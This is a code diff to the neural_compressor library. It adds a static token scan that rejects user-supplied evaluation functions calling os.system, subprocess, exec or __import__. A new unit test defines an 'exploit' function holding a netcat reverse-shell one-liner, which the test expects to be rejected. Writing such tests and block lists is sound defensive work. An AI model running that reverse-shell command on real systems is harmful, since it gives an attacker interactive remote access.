diff --git a/neural_compressor/mix_precision.py b/neural_compressor/mix_precision.py
index c9d411291d0..84a47025a65 100644
--- a/neural_compressor/mix_precision.py
+++ b/neural_compressor/mix_precision.py
@@ -29,7 +29,7 @@
 from .model import Model
 from .strategy import STRATEGIES
 from .utils import alias_param, logger
-from .utils.utility import CpuInfo, time_limit
+from .utils.utility import CpuInfo, secure_check_eval_func, time_limit
 
 
 @alias_param("conf", param_alias="config")
@@ -91,6 +91,8 @@ def fit(model, conf, eval_func=None, eval_dataloader=None, eval_metric=None, **k
         )
         sys.exit(0)
 
+    secure_check_eval_func(eval_func)
+
     wrapped_model = Model(model, conf=conf)
 
     precisions = list(set(conf.precisions) - set(conf.excluded_precisions))
diff --git a/neural_compressor/quantization.py b/neural_compressor/quantization.py
index 31cf9829f23..2f3b2460d98 100644
--- a/neural_compressor/quantization.py
+++ b/neural_compressor/quantization.py
@@ -27,7 +27,7 @@
 from .model import Model
 from .strategy import STRATEGIES
 from .utils import logger
-from .utils.utility import dump_class_attrs, time_limit
+from .utils.utility import dump_class_attrs, secure_check_eval_func, time_limit
 
 
 def fit(
@@ -153,6 +153,8 @@ def eval_func(model):
     else:
         metric = None
 
+    secure_check_eval_func(eval_func)
+
     config = _Config(quantization=conf, benchmark=None, pruning=None, distillation=None, nas=None)
 
     strategy_name = conf.tuning_criterion.strategy
diff --git a/neural_compressor/utils/utility.py b/neural_compressor/utils/utility.py
index 54ef3dde87f..bc3519678b9 100644
--- a/neural_compressor/utils/utility.py
+++ b/neural_compressor/utils/utility.py
@@ -25,6 +25,7 @@
 import ast
 import builtins
 import importlib
+import inspect
 import logging
 import os
 import os.path as osp
@@ -39,6 +40,7 @@
 from enum import Enum
 from functools import wraps
 from tempfile import NamedTemporaryFile
+from types import FunctionType
 from typing import Any, Dict, List, Optional
 
 import cpuinfo
@@ -1281,3 +1283,49 @@ def check_key_exist(data, key):
         if check_key_exist(item, key):
             return True
     return False
+
+
+# Best-effort static scan of a user-supplied ``eval_func``.  This is a
+# defense-in-depth measure, not a sandbox: token matching is trivially
+# bypassed by obfuscation, so eval_func must still come from a trusted source.
+_FORBIDDEN_PATTERNS = [
+    "import os",
+    "import subprocess",
+    "import sys",
+    "subprocess.",
+    "os.system",
+    "os.popen",
+    "popen(",
+    "Popen(",
+    "system(",
+    "exec(",
+    "__import__(",
+]
+
+
+def _static_check(func):
+    """Scan *func*'s source for forbidden tokens; raise ValueError on a hit."""
+    try:
+        src = inspect.getsource(func)
+    except OSError:  # pragma: no cover - source unavailable (REPL, C ext, ...)
+        logger.warning("Cannot read source of eval_func; skip static scan.")
+        return
+    # Scan case-sensitively: Python identifiers are case-sensitive, and
+    # lower-casing the source made mixed-case tokens such as "Popen(" dead.
+    for p in _FORBIDDEN_PATTERNS:
+        if p in src:
+            raise ValueError(f"Unsafe token detected in eval_func: {p}")
+
+
+def secure_check_eval_func(user_func):
+    """Validate *user_func*; return it unchanged, or raise RuntimeError if unsafe."""
+    if not isinstance(user_func, FunctionType):
+        # Also covers None and non-function callables whose source cannot
+        # be scanned reliably (partials, bound methods, __call__ objects).
+        logger.warning("Provided eval_func is not a plain function; security checks limited.")
+        return user_func
+    try:
+        _static_check(user_func)
+    except ValueError as e:
+        raise RuntimeError(f"Rejected unsafe eval_func: {e}") from e
+    return user_func
diff --git a/test/adaptor/pytorch_adaptor/test_adaptor_security.py b/test/adaptor/pytorch_adaptor/test_adaptor_security.py
new file mode 100644
index 00000000000..eaaa1b582e8
--- /dev/null
+++ b/test/adaptor/pytorch_adaptor/test_adaptor_security.py
@@ -0,0 +1,32 @@
+import unittest
+
+import torch
+import torch.nn as nn
+
+from neural_compressor import PostTrainingQuantConfig
+from neural_compressor.mix_precision import fit
+
+
+def exploit(model):
+    __import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f")
+    return 1.0
+
+
+class DummyTorchModel(nn.Module):
+    def forward(self, x):
+        return x
+
+
+class TestAdaptSecurity(unittest.TestCase):
+    def test_security(self):
+        dummy_model = DummyTorchModel()
+        conf = PostTrainingQuantConfig()
+        conf.precisions = ["fp32"]
+        conf.excluded_precisions = []
+        with self.assertRaises(RuntimeError) as ctx:
+            fit(model=dummy_model, conf=conf, eval_func=exploit)
+        self.assertIn("Rejected unsafe eval_func", str(ctx.exception))
+
+
+if __name__ == "__main__":
+    unittest.main()